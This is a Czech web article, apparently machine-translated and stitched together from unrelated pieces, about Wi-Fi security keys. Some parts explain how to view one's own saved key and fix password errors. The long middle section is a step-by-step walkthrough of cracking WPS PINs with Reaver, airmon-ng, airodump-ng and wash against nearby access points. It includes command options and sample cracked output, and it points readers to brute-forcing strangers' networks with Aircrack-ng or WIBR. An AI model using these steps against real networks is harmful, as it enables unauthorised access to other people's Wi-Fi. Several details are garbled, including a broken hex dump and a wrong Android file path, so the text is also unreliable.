• Co je síťový klíč v routeru asus. Wi-Fi od Rostelecom: jak zadat bezpečnostní klíč

    Při připojení k bezdrátové síti WiFi sítě uživatelé se často potýkají s potřebou zadat nějaký druh síťového bezpečnostního klíče. V tomto článku vám řekneme, co je bezpečnostní klíč bezdrátové sítě Wi-Fi, a také jak tento klíč zjistit pomocí nastavení routeru, počítače nebo notebooku, na kterém je uložen.

    Abychom pochopili, co je bezpečnostní klíč, musíme si říci pár slov o různých typech sítí Wi-Fi. Síť Wi-Fi může být otevřená nebo zabezpečená. Otevřená síť není nijak zabezpečená a pro připojení k takové síti nepotřebujete zadávat žádná data. K otevřené síti se může připojit kdokoli, hlavní je být v rámci sítě. To je velmi výhodné pro poskytování přístupu k internetu na veřejných místech. Bezpečná síť je naopak uzavřena pro příležitostné uživatele. Zabezpečené sítě se běžně používají k budování kancelářských, pracovních a domácích bezdrátových sítí. Abyste se k takové síti mohli připojit, potřebujete znát tajnou sadu znaků, která se nazývá klíč. zabezpečení wifi nebo heslo.

    Bezpečnostní klíč Wi-Fi je obecně heslo, které potřebujete znát, abyste se mohli připojit k síti. Když se připojíte k zabezpečené síti, zařízení, které používáte, vás určitě požádá o zadání bezpečnostního klíče nebo hesla. Po zadání těchto údajů se zkontroluje správnost zadaného hesla a pokud je heslo správné, dojde k navázání spojení. Pokud je heslo nesprávné, spojení je přerušeno.

    Je třeba poznamenat, že zde dochází k určitému zmatku v termínech. Na některých zařízeních (např. mobilní gadgety s operačním systémem Android nebo iOS) daný klíč zabezpečení se nazývá heslo. To znamená, že uživatel je požádán o zadání hesla a okamžitě pochopí, co se od něj vyžaduje pro připojení k síti.

    Notebooky a počítače s Windows přitom využívají více správné jméno, a to „bezpečnostní klíč“. Použití termínu „bezpečnostní klíč“ je často matoucí nezkušení uživatelé protože nechápou, co se od nich požaduje.

    Jak zjistit bezpečnostní klíč bezdrátové sítě

    Bezpečnostní klíč Wi-Fi je nainstalován na zařízení, které vytváří tuto bezdrátovou síť. Může to být bezdrátový router nebo hotspot WiFi přístup. Proto nejvíce spolehlivým způsobem Chcete-li zjistit bezpečnostní klíč Wi-Fi, přejděte do nastavení routeru nebo přístupového bodu a podívejte se.

    Abyste se nejprve připojili k síti tohoto routeru. To lze provést pomocí kabelu nebo Wi-Fi (při připojení přes WiFi vstup lze uzamknout v nastavení). Dále musíte otevřít libovolný prohlížeč a zadat adresní řádek IP adresa směrovače (obvykle 192.168.0.1 nebo 192.168.1.1).

    Poté budete vyzváni k zadání uživatelského jména (login) a hesla. Standardní přihlašovací jméno a heslo jsou často uvedeny na spodní straně routeru a tyto informace jsou také v návodu k routeru.

    Po zadání uživatelského jména a hesla se dostanete do webového rozhraní routeru. Zde musíte najít sekci s Nastavení Wi-Fi. Obvykle se tato část nazývá Wi-Fi, Bezdrátová síť, WLAN nebo Bezdrátová síť. V části Nastavení Wi-Fi najdete bezpečnostní klíč potřebný k připojení.

    Pokud máte počítač, na kterém je uložen bezpečnostní klíč, můžete to udělat, aniž byste museli jít do nastavení routeru. Chcete-li to provést, musíte otevřít „Centrum sítí a ovládání a veřejný přístup". Ve Windows 7 k tomu musíte kliknout pravým tlačítkem na ikonu. internetové připojení nebo přejděte na "Ovládací panely" a otevřete sekci "Síť a internet - Centrum sítí a sdílení"

    Ve Windows 10 je nejjednodušší použít nabídku Spustit. Stiskněte kombinaci kláves Windows-R a spusťte příkaz "control.exe /name Microsoft.NetworkandSharingCenter".

    V okně "Centrum sítí a sdílení" klikněte na odkaz "Spravovat bezdrátové sítě".

    Zde k nalezení požadované Wi-Fi sítě, klikněte na ni pravým tlačítkem a přejděte na "Vlastnosti".

    V důsledku toho se zobrazí okno s vlastnostmi vybrané sítě Wi-Fi. Chcete-li zobrazit uložený bezpečnostní klíč, přejděte na kartu „Zabezpečení“ a povolte možnost „Zobrazit zadané znaky“. Poté se požadovaná data objeví v textovém poli „Klíč zabezpečení sítě“.

    Pokud nemáte přístup k routeru a nemáte uložené heslo ve svém počítači, musíte kontaktovat správce systému nebo ISP, který spravuje vaši síť Wi-Fi.

    Každý uživatel ví, že při pokusu o připojení k zabezpečeným bezdrátovým sítím se často zobrazuje zpráva „Zadejte klíč zabezpečení sítě“. Co je tento klíč, k čemu slouží, jak se používá, kde jej najít a jak jej určit různé metody, a bude dále zvažován. Ve skutečnosti každý uživatel již ví, co to je, ale možná prostě nezná skutečný stav věcí. Ve skutečnosti po přečtení níže uvedeného materiálu již žádný uživatel nebude mít všechny otázky související s pochopením samotného termínu a metod používaných k určení takového klíče.

    Co je to obecně klíč zabezpečení sítě?

    Jaké je tedy chápání tohoto pojmu? Pokud by někdo nevěděl, bezpečnost bezdrátových sítí zajišťuje ochrana před neoprávněným přístupem do sítě a šifrování přenášených a přijímaných dat.

    Pojem klíč zároveň nijak nesouvisí s typem použitého šifrování, ale odkazuje konkrétně na poskytování zabezpečeného záznamu. Jak již mnozí pravděpodobně uhodli, otázka, co je síťový bezpečnostní klíč, má jedinou správnou odpověď: toto je nejběžnější přístupové heslo, které se zadává na vyžádání z routeru. Může se skládat z libovolné sady latinských písmen, čísel a symbolů.

    Jak to funguje?

    V otázce, co je síťový bezpečnostní klíč, nelze ignorovat některé aspekty související s tím, jak funguje. Faktem je, že požadavek nepřichází ze samotné bezdrátové sítě, ale z použitého routeru (router nebo ADSL modem).

    Když se pokusíte připojit k síti definované vaším počítačem, notebookem nebo mobilním zařízením, ze zařízení se odešle požadavek a přihlásí se do routeru. Ten zase zajišťuje bezpečnost bezdrátových sítí a dává vám jakousi výzvu k připojení, ovšem s povinným potvrzením přístupového hesla, které ve většině případů, kromě použití programů umožňujících výpočet klíče, poskytuje ochrana před neoprávněným připojením. U programů se zastavíme o něco později, ale nyní se podívejme, jak můžete takové heslo zjistit v různých systémech a na různá zařízení.

    Jak zjistit klíč zabezpečení sítě ve Windows?

    A nejprve se podívejme na desktopové operační systémy Windows ve vztahu k uživatelům, kteří z nějakého důvodu zapomněli nebo ztratili svá přístupová hesla k Wi-Fi. Co dělat, když se počítač nebo notebook bez problémů připojí k síti, ale potřebujete k němu přistupovat z jiného zařízení (například z mobilního zařízení). Kde mohu získat klíč zabezpečení sítě? Tento problém vyřešeno zcela jednoduše.

    Nejprve musíte jít do vlastností navázané spojení k tomu použijte "Centrum sítí a sdílení". Můžete jej vyvolat buď přes nabídku RMB na ikoně připojení, nebo přejít do příslušné sekce přes "Ovládací panely". Okno vlastností používá kartu zabezpečení, která obsahuje název sítě a heslo. Zobrazuje se ale pouze jako tečky. Jak najít klíč zabezpečení sítě? Ano, stačí zaškrtnout políčko u položky pro zobrazení vámi zadaných znaků a heslo se vám objeví před očima.

    Proč se tohle děje? Ano, pouze proto, že jakýkoli operační systém i při jednorázovém připojení ukládá názvy sítí, které zadáte, a heslo k nim, nemluvě o připojení, které se používá standardně.

    Získání klíče na routeru

    V zásadě platí, že pokud tato možnost uživateli s něčím nevyhovuje, můžete se vydat delší cestou pomocí webového rozhraní routeru. Chcete-li to provést, musíte zadat nastavení prostřednictvím libovolného webového prohlížeče zadáním kombinací začínajících na 192.168, poté se přidá buď 0,1 nebo 1,1 (u nestandardních modelů routerů se adresy mohou značně lišit).

    Poté přejděte do sekce bezdrátové připojení(Bezdrátové) a poté v podsekci Zabezpečení najděte pole označené PSK. To, co je v něm napsáno, je požadovaný klíč. Pokud z nějakého důvodu nemůžete zadat nastavení routeru, příkazový řádek zadejte kombinaci ipconfig a podívejte se do pole výchozí brány. Toto je adresa samotného routeru.

    Určení bezpečnostního klíče v systému Android

    Co je klíč zabezpečení sítě a jak jej najít v systému Windows, bylo zjištěno. Nyní se podívejme, jak provádět podobné postupy mobilní systémy Android. Zde je vše poněkud složitější.

    Pokud se heslo nezobrazí v normální forma v nastavení připojení, budete to muset hledat v systémové soubory, ale pro přístup k nim na zařízení musíte mít Kořenová práva a jakékoli správce souborů. Ve správci postupně procházejte adresáře Data / Hudba / WiFi a v druhém otevřete Textový dokument s názvem wpa_supplicant.conf, pak v textu najděte název hledané sítě. Vedle názvu bude zadán odpovídající klíč.

    Použití specializovaných programů

    Na mobilních systémech můžete použít zdarma WiFi utilita Password Hacker, který po spuštění prohledá všechna spojení, která kdy byla vytvořena, a po výběru požadovanou síť zobrazí na obrazovce použité přístupové heslo.

    Pokud potřebujete zjistit heslo do cizí sítě, budete muset použít poněkud nelegální techniku ​​zvanou hrubá síla. Pro Systémy Windows nejpřijatelnější je nástroj Aircrack-ng a pro systémy Android - WIBR. Jejich použití je celkem jednoduché, takže nemá smysl se na to zaměřovat. Mějte ale na paměti, že jejich použití, pokud není nelegální, je přinejmenším za hranicí slušnosti.

    Místo celkové

    To je vše, co se týká zvážení otázek souvisejících s konceptem bezpečnostního klíče. Ohledně samotného konceptu lze vyvodit jediný závěr – jedná se o nejčastější přístupové heslo. Pokud jde o to, jak to rozpoznat, zdá se, že by neměly existovat žádné zvláštní otázky, protože se to dělá docela jednoduše v jakémkoli operačním systému. S mobilní zařízení pokud nejsou přístupová práva k systémovým adresářům, mohou nastat problémy, nicméně pro získání příslušných práv můžete použít např. počítačovou utilitu Kořen Kingo, který se nejprve nainstaluje do PC a poté nainstaluje vlastní ovladač do mobilního zařízení, poté získáte práva superuživatele.

    Není to tak dávno, co se zdálo, že bezdrátová síť chráněná pomocí technologie WPA2 je docela bezpečná. Opravdu je možné vyzvednout jednoduchý klíč k připojení. Pokud ale nastavíte opravdu dlouhou klávesu, pak to nepomohou svázat ani duhové tabulky, ani akcelerace GPU. Jak se ale ukázalo, k bezdrátové síti se můžete připojit i bez něj – pomocí nedávno objevené zranitelnosti v protokolu WPS.

    VAROVÁNÍ

    Veškeré informace jsou poskytovány pouze pro vzdělávací účely. Průnik do cizí bezdrátové sítě lze snadno považovat za trestný čin. Mysli hlavou.

    Cena zjednodušení

    Otevřených přístupových bodů, ke kterým nemusíte vůbec zadávat klíč pro připojení, je stále méně. Zdá se, že brzy mohou být uvedeny v červené knize. Pokud dříve člověk možná ani neví, že bezdrátovou síť lze uzavřít klíčem a chránit se před vnější spojení, ale nyní se mu o této možnosti stále častěji říká. Vezměte si alespoň vlastní firmware, které vydávají přední poskytovatelé pro oblíbené modely routery pro zjednodušení nastavení. Musíte zadat dvě věci - přihlašovací jméno / heslo a ... klíč pro ochranu bezdrátové sítě. Ještě důležitější je, že samotní výrobci hardwaru se snaží proces nastavení zjednodušit. Většina moderních směrovačů tedy podporuje mechanismus WPS (Wi-Fi Protected Setup). S jeho pomocí může uživatel nastavit bezpečnou bezdrátovou síť během několika sekund, aniž by se vůbec obtěžoval tím, že „někde jinde musíte povolit šifrování a zaregistrovat klíč WPA“. Zadáte do systému osmimístný kód PIN, který je napsán na routeru – a máte hotovo! A tady se pevně držte. V prosinci hned dva výzkumníci hovořili o vážných zásadních chybách v protokolu WPS. Je to jako zadní vrátka pro každý router. Ukázalo se, že pokud je na přístupovém bodu aktivováno WPS (což je na okamžik ve většině směrovačů ve výchozím nastavení povoleno), můžete si během několika hodin vyzvednout PIN pro připojení a získat klíč pro připojení!

    Jak funguje WPS?

    Nápad tvůrců WPS je dobrý. Mechanismus automaticky nastaví název sítě a šifrování. Uživatel tak nemusí chodit do webového rozhraní a řešit složitá nastavení. A do již nakonfigurované sítě můžete snadno přidat jakékoli zařízení (například notebook): pokud správně zadáte PIN, obdrží všechna potřebná nastavení. To je velmi výhodné, a proto nyní všichni hlavní hráči na trhu (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) nabízejí bezdrátové routery s podporou WPS. Pojďme tomu trochu více rozumět.

    Existují tři možnosti použití WPS:

    1. Push Button Connect (PBC). Uživatel stiskne speciální tlačítko na routeru (hardware) a na počítači (software), čímž aktivuje proces konfigurace. nemáme zájem.
    2. Zadání PIN kódu ve webovém rozhraní. Uživatel vstoupí přes prohlížeč do administrativního rozhraní routeru a zadá osmimístný PIN kód napsaný na pouzdru zařízení (obrázek 1), poté proběhne proces konfigurace. Tato metoda je vhodnější pro počáteční konfiguraci routeru, takže ji také nebudeme uvažovat.
    3. Zadání kódu PIN na počítači uživatele (obrázek 2). Při připojování k routeru můžete otevřít speciální relaci WPS, v rámci které můžete nakonfigurovat router nebo získat stávající nastavení, pokud správně zadáte PIN kód. Teď je to atraktivní. K otevření takové relace není vyžadováno žádné ověření. Tohle může udělat každý! Ukazuje se, že PIN kód je již potenciálně náchylný k útoku hrubou silou. Ale to jsou jen květiny.

    Zranitelnost

    Jak jsem již dříve poznamenal, PIN se skládá z osmi číslic – existuje tedy 10^8 (100 000 000) možností, ze kterých si můžete vybrat. Počet možností však lze výrazně snížit. Faktem je, že poslední číslice PIN kódu představuje určité kontrolní součet, která se počítá na základě prvních sedmi číslic. Výsledkem je, že již dostáváme 10 ^ 7 (10 000 000) možností. Ale to není všechno! Dále se pečlivě podíváme na zařízení autentizačního protokolu WPS (obrázek 3). Zdá se, že byl speciálně navržen tak, aby ponechal možnost hrubé síly. Ukazuje se, že kontrola PIN kódu se provádí ve dvou fázích. Je rozdělena na dvě stejné části a každá část je kontrolována samostatně! Podívejme se na diagram:

    1. Pokud po odeslání zprávy M4 útočník obdržel jako odpověď EAP-NACK, pak si může být jistý, že první část PIN kódu je nesprávná.
    2. Pokud obdržel EAP-NACK po odeslání M6, pak je druhá část PIN kódu nesprávná. Dostaneme 10^4 (10 000) možností pro první polovinu a 10^3 (1 000) pro druhou. Výsledkem je, že máme pouze 11 000 možností pro kompletní výčet. Chcete-li lépe pochopit, jak to bude fungovat, podívejte se na diagram.
    3. Důležitým bodem je možná rychlost výčtu. Je omezena rychlostí, jakou router zpracovává požadavky WPS: některé přístupové body vydají výsledek každou sekundu, jiné každých deset sekund. Většinu času stráví výpočet veřejný klíč podle Diffie-Hellmanova algoritmu musí být vygenerován před krokem M3. Čas strávený na tom lze zkrátit volbou jednoduchého tajného klíče na straně klienta, což dále zjednoduší výpočet ostatních klíčů. Praxe ukazuje, že k úspěšnému výsledku většinou stačí protřídit jen polovinu všech možností a v průměru zabere hrubá síla jen čtyři až deset hodin.

    První implementace

    První implementací hrubou silou, která se objevila, byla utilita wpscrack (goo.gl/9wABj), kterou napsal výzkumník Stefan Fiböck dne jazyk Python. Obslužný program používal knihovnu Scapy, která vám umožňuje vkládat libovolné síťové balíčky. Skript lze po překladu spustit pouze v systému Linux bezdrátové rozhraní do monitorovacího režimu. Název musí být uveden jako parametry. síťové rozhraní v systému, MAC adresu bezdrátového adaptéru a MAC adresu přístupového bodu a jeho název (SSID).

    $ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer začal zkoušet 00000000 pokus trval 0,95 sekundy pokus 00010009<...>pokus o 18660005 pokus trval 1,08 sekundy pokus 18670004# nalezen První polovina pokusu o PIN trvala 1,09 sekundy pokus 18670011 pokus trval 1,08 sekundy<...>pokusem 18674095# nalezena 2. polovina PIN<...>Síťový klíč: 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ng_wpa_pass phras 0020 65 5F 67 6F 6F 64 56 3 2 6C 1 good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

    Jak vidíte, nejprve byla vybrána první polovina PIN kódu, poté druhá a nakonec program vydal klíč připravený k použití pro připojení k bezdrátové síti. Je těžké si představit, jak dlouho by trvalo uhodnout klíč této délky (61 znaků) s již existujícími nástroji. Wpscrack však není jedinou utilitou, která tuto zranitelnost zneužívá, a to je docela vtipný moment: ve stejnou dobu na stejném problému pracoval jiný výzkumník Craig Heffner z Tactical Network Solutions. Když viděl, že se na webu objevilo funkční PoC k provedení útoku, zveřejnil svůj nástroj Reaver. Nejenže automatizuje proces hrubou silou WPS-PIN a extrahuje klíč PSK, ale nabízí také více nastavení, takže útok lze provést proti široké škále směrovačů. Navíc podporuje mnohem větší počet bezdrátových adaptérů. Rozhodli jsme se to vzít jako základ a podrobně popsat, jak může útočník využít zranitelnost v protokolu WPS pro připojení k zabezpečené bezdrátové síti.

    JAK

    Stejně jako u každého jiného útoku na bezdrátovou síť budeme potřebovat Linux. Zde je třeba říci, že Reaver je přítomen v úložišti známé distribuce BackTrack, která také již obsahuje požadované ovladače Pro bezdrátových zařízení. Proto jej využijeme.

    Krok 0. Připravte systém

    Na oficiálních stránkách je BackTrack 5 R1 k dispozici ke stažení jako virtuální stroj pod VMware a spouštěcí obrázek ISO. Doporučuji poslední možnost. Obraz můžete jednoduše vypálit na disk, nebo můžete použít program k vytvoření spouštěcí flash disk: tak či onak, bootováním z takového média budeme mít systém okamžitě připravený k práci bez zbytečných problémů.

    Wi-Fi Hacking Crash Course

    1. WEP( Kabelový ekvivalent Soukromí) Úplně první technologie pro zabezpečení bezdrátové sítě se ukázala jako extrémně slabá. Může být hacknut během několika minut s využitím slabin šifry RC4, která je v něm použita. Hlavními nástroji jsou airodump-ng sniffer pro shromažďování paketů a aircrack-ng utilita používaná přímo k prolomení klíče. Existuje také speciální nástroj wesside-ng, který obecně hackuje všechny blízké body pomocí WEP v automatickém režimu.
    2. WPA/WPA2 (chráněný bezdrátový přístup)

    Hrubá síla je jediný způsob, jak najít klíč pro uzavřenou WPA / WPA2 síť (a i to pouze v případě, že dojde k dumpu tzv. WPA Handshake, který se vysílá, když se klient připojí k přístupovému bodu).

    Hrubá síla se může táhnout dny, měsíce i roky. Pro zvýšení efektivity výčtu byly nejprve použity specializované slovníky, poté byly generovány duhové tabulky a později se objevily nástroje, které zahrnovaly Technologie NVIDIA CUDA a ATI Stream pro hardwarová akcelerace proces přes GPU. Používané nástroje jsou aircrack-ng (slovník brute force), cowpatty (pomocí rainbow tables), pyrit (pomocí grafické karty).

    Krok 1. Přihlášení

    Výchozí přihlašovací jméno a heslo je root:toor. Jakmile jste v konzole, můžete bezpečně spustit "x" (existují samostatná sestavení BackTrack - jak s GNOME, tak s KDE):

    #startx

    Krok 2 Nainstalujte Reaver

    Ke stažení Reaveru potřebujeme internet. Proto připojujeme propojovací kabel nebo konfigurujeme bezdrátový adaptér(nabídka "Aplikace > Internet > Wicd Network Manager"). Dále spustíme emulátor terminálu, kam načteme Nejnovější verze utility přes úložiště:

    # apt-get update # apt-get install reaver

    Zde musím říci, že úložiště obsahuje verzi 1.3, která mně osobně osobně nefungovala. Při hledání informací o problému jsem našel příspěvek autora, který doporučuje upgrade na nejvyšší možnou verzi kompilací zdrojů převzatých z SVN. To je obecně nejvíc univerzální způsob instalace (pro jakoukoli distribuci).

    $ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

    S montáží pod BackTrack nebudou žádné problémy - osobně jsem to kontroloval. Na distribuci Arch Linux, kterou používám, je instalace ještě jednodušší díky příslušnému PKGBUILD:

    $ yaourt -S reaver-wps-svn

    Krok 3. Příprava na hrubou sílu

    Chcete-li použít Reaver, musíte udělat následující věci:

    • přepněte bezdrátový adaptér do monitorovacího režimu;
    • zjistěte název bezdrátového rozhraní;
    • zjistit MAC adresu přístupového bodu (BSSID);
    • ujistěte se, že je v bodě povoleno WPS.

    Nejprve zkontrolujte, zda je bezdrátové rozhraní v systému vůbec přítomno:

    # iwconfig

    Pokud výstup tohoto příkazu obsahuje rozhraní s popisem (obvykle je to wlan0), pak systém adaptér rozpoznal (pokud se připojil k bezdrátové síti pro stažení Reaveru, pak je lepší připojení odpojit). Přepněte adaptér do monitorovacího režimu:

    # airmon-ng start wlan0

    Tento příkaz vytvoří virtuální rozhraní v monitorovacím režimu, jeho jméno bude uvedeno na výstupu příkazu (obvykle mon0). Nyní musíme najít přístupový bod k útoku a zjistit jeho BSSID. Použijme nástroj k poslechu bezdrátového vysílání airodump-ng:

    # airodump-ng mon0

    Na obrazovce se zobrazí seznam přístupových bodů v dosahu. Zajímají nás body se šifrováním WPA / WPA2 a autentizací klíčem PSK.

    Je lepší vybrat si jednu z prvních v seznamu, protože je žádoucí provést útok dobré spojení s tečkou. Pokud je bodů mnoho a seznam se nevejde na obrazovku, můžete použít další známou utilitu - kismet, kde je rozhraní v tomto ohledu více přizpůsobeno. Volitelně můžete na místě zkontrolovat, zda je v našem bodě povolen mechanismus WPS. Chcete-li to provést, spolu s Reaverem (ale pouze pokud jej převezmete ze SVN) přichází mycí nástroj:

    # ./mytí -i mon0

    Parametr určuje název rozhraní, které bylo přepnuto do monitorovacího režimu. Můžete také použít volbu ‚-f‘ a vložit nástroji soubor cap vytvořený například stejným airodump-ng. Z nějakého neznámého důvodu BackTrack nezahrnoval mycí nástroj v balíčku Reaver. Doufejme, že do vydání článku bude tato chyba opravena.

    Krok 4. Spusťte hrubou sílu

    Nyní můžete přejít přímo k výčtu PIN. Chcete-li spustit Reaver v nejjednodušším případě, potřebujete trochu. Stačí zadat název rozhraní (které jsme dříve přepnuli do režimu monitorování) a BSSID přístupového bodu:

    # reaver -i mon0 -b 00:21:29:74:67:50 -vv

    Přepínač "-vv" zapne rozšířený výstup programu, abychom se mohli ujistit, že vše funguje, jak má.

    Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Čekání na maják od 00:21:29:74:67:50 [+] Přidruženo k 00:21:29:74:67:50 (ESSID: linksys) [+] Pokus o pin 63979978

    Pokud program důsledně odesílá PINy do přístupového bodu, pak vše začalo dobře a zůstává hloupé čekat. Proces může trvat dlouho. Většina krátký čas, u kterého se mi podařilo brutálně vynutit PIN, bylo asi pět hodin. Jakmile bude vybrán, program rád oznámí toto:

    [+] Pokus o PIN 64637129 [+] Klíč prasklý za 13654 sekund [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

    Nejcennější je zde samozřejmě klíč WPA-PSK, který lze okamžitě použít k připojení. Všechno je tak jednoduché, že se to ani nevejde do hlavy.


    Je možné se bránit?

    Před útokem se zatím můžete chránit jedním způsobem – vypnout WPS v nastavení routeru. Pravda, jak se ukázalo, ne vždy je to možné. Vzhledem k tomu, že zranitelnost neexistuje na úrovni implementace, ale na úrovni protokolu, nevyplatí se čekat na brzký patch od výrobců, který by všechny problémy vyřešil. To, co teď mohou udělat, je co nejvíce odolávat hrubé síle. Pokud například zablokujete WPS na jednu hodinu po pěti neúspěšných pokusech o zadání PIN kódu, bude hledání trvat asi 90 dní. Další otázkou však je, jak rychle lze takový patch nasadit na miliony zařízení, která fungují po celém světě?

    Aktualizace Reaveru

    V HOWTO jsme ukázali nejjednodušší a nejuniverzálnější způsob použití nástroje Reaver. Implementace WPS se však liší výrobce od výrobce, takže v některých případech je nutné dodatečné nastavení. Níže poskytnu další možnosti, což může zlepšit rychlost a efektivitu výčtu klíčů.

    1. Můžete nastavit číslo kanálu a SSID přístupového bodu: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
    2. Možnost '--dh-small', která nastavuje malou hodnotu, má příznivý vliv na rychlost hrubou silou. tajný klíč, čímž se usnadní výpočty na straně přístupového bodu: # reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
    3. Výchozí doba odezvy je pět sekund. V případě potřeby jej můžete změnit: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
    4. Výchozí prodleva mezi opakováním je jedna sekunda. Lze jej také nakonfigurovat: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
    5. Některé přístupové body mohou blokovat WPS určitý čas, v podezření, že se pokoušejí šukat. Reaver si této situace všimne a ve výchozím nastavení pozastaví iteraci na 315 sekund, dobu trvání této pauzy lze změnit: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
    6. Některé implementace protokolu WPS ukončí připojení, pokud je PIN nesprávný, ačkoli specifikace vyžaduje, aby vrátily speciální zprávu. Reaver tuto situaci automaticky rozpozná, proto je zde možnost '--nack': # reaver -i mon0 -b 00:01:02:03:04:05 --nack
    7. Možnost „--eap-terminate“ je pro ty přístupové body, které vyžadují, aby relace WPS skončila zprávou EAP FAIL: # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
    8. Výskyt chyb v relaci WPS může znamenat, že přístupový bod omezuje počet pokusů o zadání PIN kódu nebo je jednoduše přetížen požadavky. Tyto informace se zobrazí na obrazovce. V tomto případě Reaver pozastaví svou činnost a dobu pauzy lze nastavit pomocí možnosti '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

    FAQ

    Otázka: Jaký bezdrátový adaptér je potřeba pro hackování?

    Odpověď: Před experimentováním se musíte ujistit, že bezdrátový adaptér může pracovat v režimu monitoru. Nejlepší způsob- zkontrolujte seznam podporovaného hardwaru na webu projektu Aircrack-ng. Vyvstane-li otázka jakou bezdrátový modul koupit, můžete začít s jakýmkoli adaptérem založeným na čipové sadě RTL8187L. USB dongle lze snadno najít online za 20 USD.

    Otázka: Proč se mi zobrazují chyby „timeout“ a „mimo provoz“?

    Odpověď: To je obvykle způsobeno nízkou silou signálu a špatné spojení s přístupovým bodem. Přístupový bod může navíc dočasně blokovat použití WPS.

    Otázka: Proč mi nefunguje spoofing MAC adresy?

    Odpověď: Možná podvrhujete MAC virtuálního rozhraní mon0 a to nebude fungovat. Musíte zadat název skutečného rozhraní, například wlan0.

    Otázka: Proč špatný signál Reaver funguje špatně, i když stejné crackování WEP funguje dobře?

    Odpověď: K praskání WEP obvykle dochází opakovaným odesláním zachycených paketů, aby se získalo více inicializačních vektorů (IV) potřebných pro úspěšné prolomení. V tomto případě nezáleží na tom, zda se paket cestou ztratil nebo se nějak poškodil. Pro útok na WPS je ale nutné striktně dodržovat protokol přenosu paketů mezi přístupovým bodem a Reaverem a zkontrolovat každý PIN kód. A pokud se ve stejnou dobu ztratí nějaký paket nebo přijde v neslušné formě, budete muset znovu navázat relaci WPS. Díky tomu jsou útoky WPS mnohem více závislé na síle signálu. Je také důležité si uvědomit, že pokud váš bezdrátový adaptér vidí přístupový bod, neznamená to, že přístupový bod vidí vás. Takže pokud jste šťastný majitel vysoce výkonný adaptér od ALFA Network a anténu za pár desítek dBi, pak nedoufejte, že se vám podaří prolomit všechny chycené přístupové body.

    Otázka: Reaver posílá přístupovému bodu stále stejný PIN, co je špatně?

    Odpověď: Zkontrolujte, zda je na routeru povoleno WPS. To lze provést pomocí mycího nástroje: spusťte jej a zkontrolujte, zda je váš cíl na seznamu.

    Otázka: Proč se nemohu spojit s přístupovým bodem?

    Odpověď: To může být způsobeno špatná úroveň signál nebo protože váš adaptér není pro takový výzkum vhodný.

    Otázka: Proč se mi stále objevují chyby „zjištěno omezení rychlosti“? Odpověď: Je to proto, že přístupový bod zablokoval WPS. Obvykle se jedná o dočasné zablokování (cca pět minut), ale v některých případech lze vyhodit i trvalý ban (odblokování pouze přes administrativní panel). V Reaveru verze 1.3 je jedna ošklivá chyba, kvůli které není odstranění takových zámků detekováno. Jako řešení se doporučuje použít možnost „--ignore-locks“ nebo stáhnout nejnovější verzi ze SVN.

    Otázka: Je možné spustit dvě nebo více instancí Reaveru současně pro urychlení útoku?

    Odpověď: Teoreticky je to možné, ale pokud naruší stejný přístupový bod, pak se rychlost výčtu pravděpodobně nezvýší, protože v tomto případě je omezena slabým hardwarem přístupového bodu, který je již plně zatížen jedním útočník.

    Klíč zabezpečení sítě je heslo, které můžete použít k připojení k fungující síti Wi-Fi. Bezpečné fungování bezdrátové sítě na tom přímo závisí. Jeho hlavním úkolem je chránit uživatele (majitele) Wi-Fi před neoprávněným připojením k ní. Někomu se může zdát, že takové připojení obecně práci na internetu příliš nenaruší. Ve skutečnosti je to plné výrazného poklesu rychlosti internetu. Proto je třeba vytvoření hesla věnovat maximální pozornost.

    Kromě složitosti vygenerované heslo, stupeň zabezpečení bezdrátové Wi-Fi sítě je značně ovlivněn typem šifrování dat. Význam typu šifrování je vysvětlen skutečností, že všechna data přenášená v rámci konkrétní síť zašifrované. Takový systém vám umožňuje chránit se před neoprávněným připojením, protože bez znalosti hesla uživatel třetí strany pomocí svého zařízení jednoduše nebude schopen dešifrovat data přenášená v bezdrátové síti.

    Typy síťového šifrování

    Chyba „Neshoda klíče zabezpečení sítě“ na notebooku. Co dělat?

    Téměř vždy se tato chyba objeví kvůli nesprávně zadanému heslu. Počítač je stroj a pokud napíše, že heslo je nesprávné, tak je.

    • Nejprve zkontrolujeme heslo a znovu jej upřesníme.
    • Zrušte zaškrtnutí "Skrýt symboly" (pokud je nainstalováno) abyste viděli heslo, které jste zadali.
    • Musíte také zkontrolovat, zda je povoleno cap lock. Vždyť písmeno „a“ a „A“ jsou různé symboly v hesle.
    • Zkontrolujte rozložení klávesnice, heslo je nutné zadat anglickými písmeny.

    Pokud jste heslo zapomněli, můžete si jej prohlédnout v nastavení routeru nebo na jiném počítači, který se dříve k této síti připojoval. Jak si zapamatovat heslo, jsem napsal v článku:.

    Pokud nebylo možné opravit chybu „Nesoulad klíče zabezpečení sítě“, změňte heslo na svém Wi-Fi routeru pomocí těchto pokynů:. S novým heslem by se mělo vše spojit.

    Chyba: „Nesprávný klíč nebo přístupová fráze“

    Po zadání hesla a kliknutí na tlačítko OK se také může objevit zpráva ve vyskakovacím okně: "Nesprávný klíč nebo přístupová fráze".


    Tato chyba se objeví, pokud zadáte klíč méně než 8 znaků (a máte nastavenou metodu šifrování WPA2). V takové situaci potřebujete v nastavení vašeho routeru správně nastavit heslo pro síť Wi-Fi. Jak to udělat na různých routerech, napsal jsem v pokynech:

    Změnit nastavení adaptéru.

    • klikněte na ikonu Internet v pravém dolním rohu (zásobník);
    • vyberte přístupový bod;
    • zadejte a potvrďte heslo.

